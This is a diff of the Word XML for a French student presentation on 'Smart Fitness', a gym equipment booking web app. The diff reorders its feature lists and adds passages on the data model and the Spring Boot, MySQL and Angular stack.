--- a/docs/oral/presOralFitnessContent.docx
+++ b/docs/oral/presOralFitnessContent.docx
@@ -15,7 +15,6 @@
         <w:t>Présentation du projet chef d’œuvre</w:t>
       </w:r>
     </w:p>
-    <w:p/>
     <w:p>
       <w:pPr>
         <w:ind w:firstLine="708"/>
@@ -89,6 +88,7 @@
         <w:spacing w:line="256" w:lineRule="auto"/>
         <w:textAlignment w:val="baseline"/>
       </w:pPr>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:t>La th</w:t>
       </w:r>
@@ -96,7 +96,11 @@
         <w:t>èm</w:t>
       </w:r>
       <w:r>
-        <w:t>e du projet</w:t>
+        <w:t>e</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> du projet</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -212,6 +216,11 @@
       </w:pPr>
       <w:r>
         <w:t>Le Groupe La Poste</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Compétence - oral</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -358,6 +367,7 @@
         </w:tabs>
         <w:spacing w:before="0" w:after="0"/>
       </w:pPr>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
@@ -370,6 +380,7 @@
         </w:rPr>
         <w:t>GeoPost</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
@@ -716,7 +727,27 @@
           <w:szCs w:val="22"/>
           <w:lang w:eastAsia="en-US"/>
         </w:rPr>
-        <w:t>. Son organisation est structurée autour de plusieurs pôles dont un qui est dédié aux développements d’un référentiel de données (ftref).</w:t>
+        <w:t>. Son organisation est structurée autour de plusieurs pôles dont un qui est dédié aux développements d’un référentiel de données (</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+          <w:lang w:eastAsia="en-US"/>
+        </w:rPr>
+        <w:t>ftref</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+          <w:lang w:eastAsia="en-US"/>
+        </w:rPr>
+        <w:t>).</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -739,7 +770,27 @@
           <w:szCs w:val="22"/>
           <w:lang w:eastAsia="en-US"/>
         </w:rPr>
-        <w:t>Comme les besoins de développement de ftref sont axés sur le back et qu’en parallèle les règles de sécurité en matière d’accès aux applications sont restrictives, j’ai préféré opter pour un projet personnel plus en phase avec les technologies enseignées et donc plus facile pour à concevoir et à mettre en œuvre.</w:t>
+        <w:t xml:space="preserve">Comme les besoins de développement de </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+          <w:lang w:eastAsia="en-US"/>
+        </w:rPr>
+        <w:t>ftref</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+          <w:lang w:eastAsia="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> sont axés sur le back et qu’en parallèle les règles de sécurité en matière d’accès aux applications sont restrictives, j’ai préféré opter pour un projet personnel plus en phase avec les technologies enseignées et donc plus facile pour à concevoir et à mettre en œuvre.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -760,13 +811,10 @@
         <w:lastRenderedPageBreak/>
         <w:t>Les fonctionnalités</w:t>
       </w:r>
-      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
-      <w:bookmarkEnd w:id="0"/>
-      <w:r>
-        <w:rPr>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> du projet</w:t>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Contexte - oral</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -791,19 +839,11 @@
       <w:pPr>
         <w:pStyle w:val="Titre3"/>
       </w:pPr>
-      <w:bookmarkStart w:id="1" w:name="_Toc8551665"/>
+      <w:bookmarkStart w:id="0" w:name="_Toc8551665"/>
       <w:r>
         <w:t>3.1 L’axe clientèle</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="1"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:ind w:left="357" w:firstLine="351"/>
-      </w:pPr>
-      <w:r>
-        <w:t>Après s’être inscrit sur le site, un client pourra</w:t>
-      </w:r>
+      <w:bookmarkEnd w:id="0"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -819,7 +859,7 @@
         <w:textAlignment w:val="baseline"/>
       </w:pPr>
       <w:r>
-        <w:t>Constituer une ou plusieurs séances en sélectionnant pour chacune d’entre elles un ou plusieurs équipements.</w:t>
+        <w:t>Chaque client devra donc créer un compte utilisateur pour pouvoir accéder aux différents services proposés par le site.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -836,7 +876,16 @@
         <w:textAlignment w:val="baseline"/>
       </w:pPr>
       <w:r>
-        <w:t>Visualiser sous forme de feuille de route le contenu de chaque séance réservée.</w:t>
+        <w:t>Chaque séance est une séquence de réservation</w:t>
+      </w:r>
+      <w:r>
+        <w:t>s</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> d’équipements </w:t>
+      </w:r>
+      <w:r>
+        <w:t>d’une durée de 10’.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -853,7 +902,7 @@
         <w:textAlignment w:val="baseline"/>
       </w:pPr>
       <w:r>
-        <w:t>Souscrire à un abonnement afin de bénéficier des séances à moitié prix.</w:t>
+        <w:t>Visualiser sous forme de feuille de route le contenu de chaque séance réservée.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -870,7 +919,7 @@
         <w:textAlignment w:val="baseline"/>
       </w:pPr>
       <w:r>
-        <w:t>Visualiser le catalogue de la boutique en ligne et acheter des produits.</w:t>
+        <w:t>Souscrire à un abonnement afin de bénéficier des séances à moitié prix.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -887,25 +936,7 @@
         <w:textAlignment w:val="baseline"/>
       </w:pPr>
       <w:r>
-        <w:t>Accéder à l’historique des commandes.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Titre3"/>
-      </w:pPr>
-      <w:bookmarkStart w:id="2" w:name="_Toc8551666"/>
-      <w:r>
-        <w:t>3.2 L’axe gérance</w:t>
-      </w:r>
-      <w:bookmarkEnd w:id="2"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:ind w:firstLine="360"/>
-      </w:pPr>
-      <w:r>
-        <w:t>Le staff disposera des fonctionnalités suivantes :</w:t>
+        <w:t>Visualiser le catalogue de la boutique en ligne et acheter des produits.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -922,7 +953,25 @@
         <w:textAlignment w:val="baseline"/>
       </w:pPr>
       <w:r>
-        <w:t>La gestion des infrastructures du site (ajout et paramétrage des équipements).</w:t>
+        <w:t>Accéder à l’historique des commandes.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Titre3"/>
+      </w:pPr>
+      <w:bookmarkStart w:id="1" w:name="_Toc8551666"/>
+      <w:r>
+        <w:t>3.2 L’axe gérance</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="1"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:firstLine="360"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Le staff disposera des fonctionnalités suivantes :</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -939,7 +988,7 @@
         <w:textAlignment w:val="baseline"/>
       </w:pPr>
       <w:r>
-        <w:t>La gestion des offres (création de formules d’abonnements et mise en ligne d’un catalogue)</w:t>
+        <w:t>La gestion des infrastructures du site (ajout et paramétrage des équipements).</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -956,7 +1005,7 @@
         <w:textAlignment w:val="baseline"/>
       </w:pPr>
       <w:r>
-        <w:t>Une vue des revenus et dépenses de chaque équipement.</w:t>
+        <w:t>La gestion des offres (création de formules d’abonnements et mise en ligne d’un catalogue)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -973,7 +1022,7 @@
         <w:textAlignment w:val="baseline"/>
       </w:pPr>
       <w:r>
-        <w:t>Une synthèse glissante de l’évolution du taux de réservation.</w:t>
+        <w:t>Une vue des revenus et dépenses de chaque équipement.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -990,7 +1039,7 @@
         <w:textAlignment w:val="baseline"/>
       </w:pPr>
       <w:r>
-        <w:t>La gestion des comptes utilisateurs du staff.</w:t>
+        <w:t>Une synthèse glissante de l’évolution du taux de réservation.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1007,39 +1056,7 @@
         <w:textAlignment w:val="baseline"/>
       </w:pPr>
       <w:r>
-        <w:t>La gestion de la diffusion d’annonces à caractère événementiel.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Paragraphedeliste"/>
-        <w:suppressAutoHyphens/>
-        <w:autoSpaceDN w:val="0"/>
-        <w:spacing w:line="256" w:lineRule="auto"/>
-        <w:contextualSpacing w:val="0"/>
-        <w:textAlignment w:val="baseline"/>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Titre1"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="13"/>
-        </w:numPr>
-      </w:pPr>
-      <w:r>
-        <w:t>Les modalités d’usage de l’application</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Paragraphedeliste"/>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>Le périmètre contextuel de l’application nous permet d’en fixer ses modalités d’usage :</w:t>
+        <w:t>La gestion des comptes utilisateurs du staff.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1056,7 +1073,119 @@
         <w:textAlignment w:val="baseline"/>
       </w:pPr>
       <w:r>
-        <w:t>L’ensemble des équipements disponibles à la réservation et leurs tarifs de prestation sont saisis par le staff. Cette grille tarifaire peut être évolutive au fil du temps et est propre à chaque équipement. On appelle prestation, la réservation d’un équipement par un client pour une durée de 10’. Chaque séance est une séquence de réservation d’équipements de d’une durée de 10’</w:t>
+        <w:t>La gestion de la diffusion d’annonces à caractère événementiel.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:suppressAutoHyphens/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:spacing w:line="256" w:lineRule="auto"/>
+        <w:textAlignment w:val="baseline"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Titre1"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="4"/>
+        </w:numPr>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>Conception</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> et codage</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>des composants</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:firstLine="708"/>
+      </w:pPr>
+      <w:r>
+        <w:t>La première phase de conception consiste</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> à </w:t>
+      </w:r>
+      <w:r>
+        <w:t>modéliser l’application et à produire ce que l’on appelle un Modèle Logique de données.</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> Un </w:t>
+      </w:r>
+      <w:r>
+        <w:t>Modèle Logique de données</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> permet de représenter </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">sous forme de tables SQL </w:t>
+      </w:r>
+      <w:r>
+        <w:t>les entités de l’application</w:t>
+      </w:r>
+      <w:r>
+        <w:t>. Pour le projet Smart Fitness, le MLD est le suivant :</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>entité</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>) : correspond à la notion</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> de concept comme la catégorie d’un événement</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:pPr>
+        <w:ind w:firstLine="708"/>
+      </w:pPr>
+      <w:r>
+        <w:t>MLD</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> - oral</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">Afin de faciliter la lecture du modèle, les fonctionnalités </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">sont regroupées par domaine : </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1066,14 +1195,9 @@
           <w:ilvl w:val="0"/>
           <w:numId w:val="11"/>
         </w:numPr>
-        <w:suppressAutoHyphens/>
-        <w:autoSpaceDN w:val="0"/>
-        <w:spacing w:line="256" w:lineRule="auto"/>
-        <w:contextualSpacing w:val="0"/>
-        <w:textAlignment w:val="baseline"/>
-      </w:pPr>
-      <w:r>
-        <w:t>Chaque équipement est affecté à une catégorie et est localisée dans une salle. On appelle catégorie, une famille d’équipement.</w:t>
+      </w:pPr>
+      <w:r>
+        <w:t>En vert, on retrouve les fonctionnalités relatives à la gestion des équipements</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1083,14 +1207,9 @@
           <w:ilvl w:val="0"/>
           <w:numId w:val="11"/>
         </w:numPr>
-        <w:suppressAutoHyphens/>
-        <w:autoSpaceDN w:val="0"/>
-        <w:spacing w:line="256" w:lineRule="auto"/>
-        <w:contextualSpacing w:val="0"/>
-        <w:textAlignment w:val="baseline"/>
-      </w:pPr>
-      <w:r>
-        <w:t>Une séance est constituée d’au moins une réservation d’un équipement (donc 10’) et au plus d’un ensemble de réservations limitées à une même journée. Un client peut se créer plusieurs séances dans une journée.</w:t>
+      </w:pPr>
+      <w:r>
+        <w:t>En vert, les fonctionnalités relatives à la réservation der équipements</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1100,14 +1219,9 @@
           <w:ilvl w:val="0"/>
           <w:numId w:val="11"/>
         </w:numPr>
-        <w:suppressAutoHyphens/>
-        <w:autoSpaceDN w:val="0"/>
-        <w:spacing w:line="256" w:lineRule="auto"/>
-        <w:contextualSpacing w:val="0"/>
-        <w:textAlignment w:val="baseline"/>
-      </w:pPr>
-      <w:r>
-        <w:t>Le staff saisit l’ensemble des offres (types d’abonnements et articles du catalogue) qui seront proposées aux clients disposant d’un compte « Smart Fitness ».</w:t>
+      </w:pPr>
+      <w:r>
+        <w:t>En violet, les fonctionnalités qui concernent les abonnements et les produits du catalogue</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1117,15 +1231,12 @@
           <w:ilvl w:val="0"/>
           <w:numId w:val="11"/>
         </w:numPr>
-        <w:suppressAutoHyphens/>
-        <w:autoSpaceDN w:val="0"/>
-        <w:spacing w:line="256" w:lineRule="auto"/>
-        <w:contextualSpacing w:val="0"/>
-        <w:textAlignment w:val="baseline"/>
-      </w:pPr>
-      <w:r>
-        <w:lastRenderedPageBreak/>
-        <w:t>Chaque client devra donc créer un compte utilisateur pour pouvoir accéder aux différents services proposés par le site.</w:t>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">En jaune, </w:t>
+      </w:r>
+      <w:r>
+        <w:t>les fonctionnalités inhérentes à la gestion des utilisateurs</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1135,257 +1246,462 @@
           <w:ilvl w:val="0"/>
           <w:numId w:val="11"/>
         </w:numPr>
-        <w:suppressAutoHyphens/>
-        <w:autoSpaceDN w:val="0"/>
-        <w:spacing w:line="256" w:lineRule="auto"/>
-        <w:ind w:left="0" w:firstLine="432"/>
-        <w:contextualSpacing w:val="0"/>
-      </w:pPr>
-      <w:r>
-        <w:t>L’abonnement permet aux clients de bénéficier de la réservation des équipements à moitié prix.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:suppressAutoHyphens/>
-        <w:autoSpaceDN w:val="0"/>
-        <w:spacing w:line="256" w:lineRule="auto"/>
-        <w:textAlignment w:val="baseline"/>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Titre1"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="16"/>
-        </w:numPr>
-        <w:rPr>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>Conception et le codage des composants front-end et back-end</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:ind w:firstLine="283"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">Afin de concevoir une application web fiable et sûr, il est préconisé d’entreprendre une démarche de cycle de développement sécurisé </w:t>
-      </w:r>
-      <w:r>
-        <w:t>et d’intégrer les tests unitaires lors du</w:t>
+      </w:pPr>
+      <w:r>
+        <w:t>La table Evénement destinée à stocker les annonces à caractère événementiel est isolée</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:pPr>
+        <w:ind w:firstLine="708"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Dans un second temps, il s’agit de décider </w:t>
+      </w:r>
+      <w:r>
+        <w:t>des plates</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> de développement :</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:firstLine="708"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Le projet</w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve">codage des composants. </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Titre2"/>
+        <w:t>Smart Fitness</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> est une application</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> tournant sur</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+        </w:rPr>
+        <w:t>Spring</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Boot</w:t>
+      </w:r>
+      <w:r>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Backend</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>)</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> adossé</w:t>
+      </w:r>
+      <w:r>
+        <w:t>e</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t>à une base de données</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> relationnelle</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> MySQL</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> et déléguant l’affichage des pages </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">html à </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Angular</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> (</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Frontend</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>)</w:t>
+      </w:r>
+      <w:r>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:ind w:firstLine="708"/>
       </w:pPr>
       <w:r>
-        <w:t>5</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">.1 </w:t>
-      </w:r>
-      <w:r>
-        <w:t>La conception du projet</w:t>
+        <w:t>Une base de données a pour rôle</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> de stocker les données dans des tables. Le fait que ce soit une base relationnelle permet de récupérer en une seule requête des informations en provenance de différentes tables.</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:ind w:firstLine="708"/>
       </w:pPr>
-      <w:r>
-        <w:t>La première phase de conception consiste</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> à décider</w:t>
-      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Spring</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> Boot est un </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>framework</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
-        <w:t>de la plate-forme développement</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">. </w:t>
-      </w:r>
-      <w:r>
-        <w:t>Le projet</w:t>
+        <w:t>faisant tourner</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> sur un serveur web</w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
-      <w:r>
-        <w:t>Smart Fitness</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> est une application</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> tournant sur</w:t>
-      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>tomcat</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
-        <w:rPr>
-          <w:i/>
-        </w:rPr>
-        <w:t>Spring Boot</w:t>
-      </w:r>
-      <w:r>
-        <w:t>(Backend)</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> adossé</w:t>
-      </w:r>
-      <w:r>
-        <w:t>e</w:t>
+        <w:t xml:space="preserve">un projet </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Spr</w:t>
+      </w:r>
+      <w:r>
+        <w:t>ing</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">. Un projet String étant la structure (boite à outils, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>framework</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>) hébergeant l’</w:t>
+      </w:r>
+      <w:r>
+        <w:t>application JEE (Java Edition Entreprise</w:t>
+      </w:r>
+      <w:r>
+        <w:t>)</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> du </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>backend</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">.  </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:ind w:firstLine="709"/>
+        <w:rPr>
+          <w:sz w:val="16"/>
+          <w:szCs w:val="16"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="16"/>
+          <w:szCs w:val="16"/>
+        </w:rPr>
+        <w:t>[</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="16"/>
+          <w:szCs w:val="16"/>
+        </w:rPr>
+        <w:t>Une application JEE permet</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:ind w:firstLine="709"/>
+        <w:rPr>
+          <w:sz w:val="16"/>
+          <w:szCs w:val="16"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="16"/>
+          <w:szCs w:val="16"/>
+        </w:rPr>
+        <w:t>•</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="16"/>
+          <w:szCs w:val="16"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="16"/>
+          <w:szCs w:val="16"/>
+        </w:rPr>
+        <w:t xml:space="preserve">La </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="16"/>
+          <w:szCs w:val="16"/>
+        </w:rPr>
+        <w:t>Gestion des instances de classes (JavaBean et/ou métier),</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:ind w:firstLine="709"/>
+        <w:rPr>
+          <w:sz w:val="16"/>
+          <w:szCs w:val="16"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="16"/>
+          <w:szCs w:val="16"/>
+        </w:rPr>
+        <w:t>•</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="16"/>
+          <w:szCs w:val="16"/>
+        </w:rPr>
+        <w:tab/>
+        <w:t xml:space="preserve">Programmation orientée </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="16"/>
+          <w:szCs w:val="16"/>
+        </w:rPr>
+        <w:t>objet</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="16"/>
+          <w:szCs w:val="16"/>
+        </w:rPr>
+        <w:t>,</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:ind w:firstLine="709"/>
+        <w:rPr>
+          <w:sz w:val="16"/>
+          <w:szCs w:val="16"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="16"/>
+          <w:szCs w:val="16"/>
+        </w:rPr>
+        <w:t>•</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="16"/>
+          <w:szCs w:val="16"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="16"/>
+          <w:szCs w:val="16"/>
+        </w:rPr>
+        <w:t xml:space="preserve">L’organisation du code source selon le </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="16"/>
+          <w:szCs w:val="16"/>
+        </w:rPr>
+        <w:t>Modèle MVC,</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:ind w:firstLine="709"/>
+        <w:rPr>
+          <w:sz w:val="16"/>
+          <w:szCs w:val="16"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="16"/>
+          <w:szCs w:val="16"/>
+        </w:rPr>
+        <w:t>•</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="16"/>
+          <w:szCs w:val="16"/>
+        </w:rPr>
